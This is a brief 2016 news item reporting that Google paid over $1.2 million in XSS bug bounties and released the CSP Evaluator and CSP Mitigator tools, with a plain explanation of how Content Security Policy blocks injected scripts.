Google says it paid over $1.2 million just for XSS bugs
Sep 27, 2016 20:30 GMT · By Catalin Cimpanu Google released two new tools called CSP Evaluator and CSP Mitigator that help security researchers identify weaknesses that are often exploited to launch XSS attacks.
Both tools revolve around CSP, or Content Security Policy, a security mechanism implemented by all major browsers, albeit in a different manner.
CSP is a set of rules that allow developers to restrict which scripts are allowed to execute inside a page, so when attackers find a way to inject HTML code inside a vulnerable application, they won't be able to load malicious scripts and other types of resources, because CSP strictly prohibits and blocks those payloads at the browser level.
Full Article